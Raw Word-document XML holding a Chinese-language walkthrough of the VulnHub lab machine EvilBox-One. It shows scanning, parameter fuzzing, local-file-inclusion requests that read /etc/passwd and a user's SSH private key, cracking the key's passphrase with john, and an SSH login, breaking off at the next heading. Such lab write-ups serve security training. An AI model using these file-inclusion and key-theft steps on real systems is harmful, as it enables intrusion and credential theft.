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9A201" w14:textId="7E128288" w:rsidR="000C017D" w:rsidRDefault="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>EvilBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>---One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAC648" w14:textId="6F1F51BE" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E24C69">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/evilbox-one,736/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CEDCD1E" w14:textId="77777777" w:rsidR="00FF095A" w:rsidRDefault="00FF095A"/>
    <w:p w14:paraId="25573129" w14:textId="77777777" w:rsidR="00FF095A" w:rsidRDefault="00FF095A"/>
    <w:p w14:paraId="01BF0479" w14:textId="2BB67C76" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909E60E" w14:textId="646B47BF" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84FFE9" w14:textId="63561E9F" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:r w:rsidRPr="00FF095A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E1A02F" wp14:editId="4A3AEF32">
            <wp:extent cx="5274310" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1497323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23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3AD8" w14:textId="17D720C7" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3E65B" w14:textId="058CD1B1" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1452EC" w14:textId="5DF6628F" w:rsidR="00FF095A" w:rsidRDefault="00FF095A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF095A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7632D133" wp14:editId="17EF4BDE">
            <wp:extent cx="5274310" cy="1899285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1729367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67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52D" w14:textId="77777777" w:rsidR="00FF095A" w:rsidRDefault="00FF095A" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描端口信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E43234F" w14:textId="7B027C44" w:rsidR="00FF095A" w:rsidRDefault="00FF095A" w:rsidP="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF095A">
        <w:t xml:space="preserve"> -O -p22,80 192.168.21.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C83B9E" w14:textId="6C8F27B2" w:rsidR="00FF095A" w:rsidRDefault="00FF095A" w:rsidP="00FF095A">
      <w:r w:rsidRPr="00FF095A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF2D82A" wp14:editId="5E008A9E">
            <wp:extent cx="5274310" cy="2044065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1812091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91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C074" w14:textId="71FCD1CA" w:rsidR="00FF095A" w:rsidRDefault="004157AD" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64F08C" w14:textId="2AE80957" w:rsidR="004157AD" w:rsidRDefault="004157AD" w:rsidP="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004157AD">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004157AD">
        <w:t xml:space="preserve"> --script=vuln -p22,80 192.168.21.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5682BD" w14:textId="3754557A" w:rsidR="004157AD" w:rsidRDefault="004157AD" w:rsidP="00FF095A">
      <w:r w:rsidRPr="004157AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="395FEF9B" wp14:editId="28A0CEF0">
            <wp:extent cx="5274310" cy="2547620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1112162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62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28D5" w14:textId="21517F63" w:rsidR="004157AD" w:rsidRDefault="005D2669" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F091EAA" w14:textId="51AC38AA" w:rsidR="005D2669" w:rsidRDefault="005D2669" w:rsidP="00FF095A">
      <w:r w:rsidRPr="005D2669">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5706A933" wp14:editId="1F5609CD">
            <wp:extent cx="5274310" cy="4456430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="49512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26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F51D" w14:textId="4397D2CF" w:rsidR="005D2669" w:rsidRDefault="005D2669" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再去看看robots</w:t>
      </w:r>
      <w:r>
        <w:t>.t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE342E" w14:textId="077B1F14" w:rsidR="005D2669" w:rsidRDefault="0071195F" w:rsidP="00FF095A">
      <w:r w:rsidRPr="0071195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1963F1D9" wp14:editId="2A41D26C">
            <wp:extent cx="4450466" cy="1478408"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="49220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0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2DC5" w14:textId="4637960B" w:rsidR="0071195F" w:rsidRDefault="0071195F" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前扫描到的</w:t>
      </w:r>
      <w:r w:rsidRPr="0071195F">
        <w:t>/secret/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D099CC4" w14:textId="29117BF7" w:rsidR="0071195F" w:rsidRDefault="0071195F" w:rsidP="00FF095A">
      <w:r w:rsidRPr="0071195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECD750B" wp14:editId="63AAA607">
            <wp:extent cx="5274310" cy="6557645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="778306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06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B202" w14:textId="4558C5D4" w:rsidR="0071195F" w:rsidRDefault="0071195F" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描网站目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0273B1" w14:textId="19DB52EC" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r w:rsidRPr="008E09B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E08E40E" wp14:editId="45A54553">
            <wp:extent cx="5274310" cy="2444750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="831241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41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60B" w14:textId="568960E6" w:rsidR="008E09B9" w:rsidRPr="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问之后发现全白</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11149512" w14:textId="4DEE14FD" w:rsidR="0071195F" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r w:rsidRPr="008E09B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A81696" wp14:editId="4E077582">
            <wp:extent cx="5274310" cy="1711960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="242686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868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E2BE" w14:textId="1BB3258B" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么都没有，接着扫漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE7D8D" w14:textId="30FD3429" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E09B9">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724ECD7D" w14:textId="6DF53F81" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E09B9">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E09B9">
        <w:t xml:space="preserve"> -host 192.168.21.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75F6A8" w14:textId="68FEF3AA" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E09B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D6ACF5" wp14:editId="3E4A3203">
            <wp:extent cx="5274310" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="246315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15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707" w14:textId="25A4D9AB" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BDEA5" w14:textId="147CFC4C" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E09B9">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E09B9">
        <w:t xml:space="preserve"> -host </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00E24C69">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.153/dvwa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A77D378" w14:textId="12F2E555" w:rsidR="008E09B9" w:rsidRDefault="008E09B9" w:rsidP="00FF095A">
      <w:r w:rsidRPr="008E09B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B54AB40" wp14:editId="3926B3B3">
            <wp:extent cx="5274310" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1514806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06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CE85" w14:textId="1A6FB5BE" w:rsidR="008E09B9" w:rsidRDefault="0003761E" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常的但是发现了一点点不对劲的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B017886" w14:textId="2F4F5B42" w:rsidR="0003761E" w:rsidRDefault="0003761E" w:rsidP="00FF095A">
      <w:r w:rsidRPr="0003761E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126CCDA5" wp14:editId="5518DD62">
            <wp:extent cx="5274310" cy="5383530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="665028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28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660" w14:textId="45CE48B9" w:rsidR="0003761E" w:rsidRDefault="0003761E" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我用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拿到数据包的时候发现这里有</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值且不是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我最开始访问的时候的白色，这里一定有一个参数接受我的变量，直接抓包看变量名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A3115" w14:textId="07DD3891" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="00FF095A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t xml:space="preserve"> -w /root/Desktop/list -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00E24C69">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.153/secret/evil.php?FUZZ=../robots.txt -fs 0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AA62723" w14:textId="58362D8E" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="00FF095A">
      <w:r w:rsidRPr="005A1EC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="317E80CC" wp14:editId="5B5F9F0D">
            <wp:extent cx="5274310" cy="2938780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1529552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52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5A06" w14:textId="6927D36D" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="00FF095A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看一下这里是否有文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8943AB" w14:textId="3225C084" w:rsidR="005A1EC1" w:rsidRDefault="00000000" w:rsidP="005A1EC1">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="005A1EC1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.153/secret/evil.php?command=</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="005A1EC1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>/..</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidR="005A1EC1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>/../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A752FC2" w14:textId="291A9FE2" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="005A1EC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7479D0" wp14:editId="63604FAD">
            <wp:extent cx="5274310" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1153192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927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BF09" w14:textId="14EBD933" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确认有这个漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC30F6" w14:textId="43D619DD" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现新用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C7870" w14:textId="2BA833AF" w:rsidR="005A1EC1" w:rsidRDefault="005A1EC1" w:rsidP="005A1EC1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>mowree:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>x:1000:1000</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>:mowree,,,:/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>mowree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1EC1">
        <w:t>nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4411A620" w14:textId="3834A665" w:rsidR="005A1EC1" w:rsidRDefault="008B6381" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想直接找到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密钥文件能直接登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53576689" w14:textId="53132568" w:rsidR="003E5D1A" w:rsidRDefault="00000000" w:rsidP="005A1EC1">
      <w:hyperlink r:id="rId22" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="003E5D1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.153/secret/evil.php?command</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidR="003E5D1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>=../../../../../../../../../home/mowree/.ssh/id_rsa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="399EF2A7" w14:textId="1218E70E" w:rsidR="008B6381" w:rsidRDefault="003E5D1A" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能hash碰撞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D3FF1B" w14:textId="1BD5F217" w:rsidR="003E5D1A" w:rsidRDefault="003E5D1A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="003E5D1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B5234F" wp14:editId="4B8C7E50">
            <wp:extent cx="5274310" cy="2000885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1493014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14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7AF2" w14:textId="6C485668" w:rsidR="003E5D1A" w:rsidRDefault="003E5D1A" w:rsidP="005A1EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥拿到，下载下来进行hash碰撞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F371F" w14:textId="41E3B0F0" w:rsidR="003E5D1A" w:rsidRDefault="003E5D1A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="003E5D1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5707C5AC" wp14:editId="33A6DF4B">
            <wp:extent cx="5274310" cy="4869180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="915056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67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2CAB" w14:textId="67819EF7" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4024D3E9" w14:textId="62206C87" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmodd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64CB4">
        <w:t xml:space="preserve">600 </w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00F64CB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（只能是6</w:t>
      </w:r>
      <w:r w:rsidR="00F64CB4">
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="00F64CB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的权限）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103FBC9" w14:textId="1A4FECA2" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="0016573A">
        <w:t>python3 ssh2john.py /root/Desktop/hash &gt; /root/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016573A">
        <w:t>idrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33EDF730" w14:textId="48AFA685" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="0016573A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15942884" wp14:editId="44185A93">
            <wp:extent cx="5274310" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="836580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80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A24A" w14:textId="1FCCF1F4" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="0016573A">
        <w:t xml:space="preserve">john </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016573A">
        <w:t>idrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016573A">
        <w:t xml:space="preserve"> --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016573A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016573A">
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636360DC" w14:textId="1AC42EDC" w:rsidR="0016573A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="0016573A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7346710E" wp14:editId="5552FAED">
            <wp:extent cx="5274310" cy="1365885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1020867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7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FFEB" w14:textId="0284C6EE" w:rsidR="003E5D1A" w:rsidRDefault="0016573A" w:rsidP="005A1EC1">
      <w:r>
        <w:t>登入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mowree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A2AA18" w14:textId="08746157" w:rsidR="003E5D1A" w:rsidRDefault="00F64CB4" w:rsidP="005A1EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F64CB4">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F64CB4">
        <w:t xml:space="preserve"> mowree@192.168.21.153 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F64CB4">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F64CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F64CB4">
        <w:t>idrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7010AC1D" w14:textId="11B78364" w:rsidR="00F64CB4" w:rsidRDefault="00F64CB4" w:rsidP="005A1EC1">
      <w:r w:rsidRPr="00F64CB4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4838580A" wp14:editId="40047DC0">
            <wp:extent cx="5274310" cy="899795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1907746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468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6E2E" w14:textId="111D6211" w:rsidR="00F64CB4" w:rsidRDefault="00F64CB4" w:rsidP="005A1EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
